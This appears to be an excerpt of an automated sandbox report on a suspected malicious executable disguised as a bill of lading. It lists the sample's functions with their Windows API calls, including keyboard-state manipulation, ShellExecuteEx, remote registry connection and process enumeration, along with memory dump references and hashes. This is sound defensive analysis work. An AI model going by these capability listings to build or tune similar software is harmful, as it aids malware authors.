                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                      • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                      • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                      • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                      • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                      • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                      • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4082120231-0
                                                                                                                      • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                      • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                      • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                      • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                      Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                      • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                      • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                      • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                      • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                      • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                      • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4082120231-0
                                                                                                                      • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                      • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                      • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                      • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                      Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 288456094-0
                                                                                                                      • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                      • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                      • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                      • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                      Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 004449B0
                                                                                                                      • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                      • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                      • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                      • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                      Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 00444BA9
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                      • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                      • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                      • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                      Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                      • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                      • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                      • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                      Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConnectRegistry_wcslen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 535477410-2761332787
                                                                                                                      • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                      • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                      • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                      • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                      Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00457C34
                                                                                                                      • _memset.LIBCMT ref: 00457CE8
                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                      • String ID: <$@
                                                                                                                      • API String ID: 1325244542-1426351568
                                                                                                                      • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                      • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                      • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                      • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                      Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                      • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcscat.LIBCMT ref: 004737F6
                                                                                                                      • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547909840-0
                                                                                                                      • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                      • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                      • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                      • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                      Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                      • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2354583917-0
                                                                                                                      • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                      • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                      • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                      • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                      Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                      • GetMenu.USER32 ref: 004776AA
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                      • _wcslen.LIBCMT ref: 0047771A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1823500076-0
                                                                                                                      • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                      • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                      • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                      • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                      Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                      • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                      • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                      • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 896007046-0
                                                                                                                      • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                      • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                      • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                      • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                      Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                      • SendMessageW.USER32(030D1A80,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                      • SendMessageW.USER32(030D1A80,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 312131281-0
                                                                                                                      • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                      • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                      • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                      • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                      Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004484C4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                      • IsMenu.USER32(?), ref: 0044857B
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                      • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
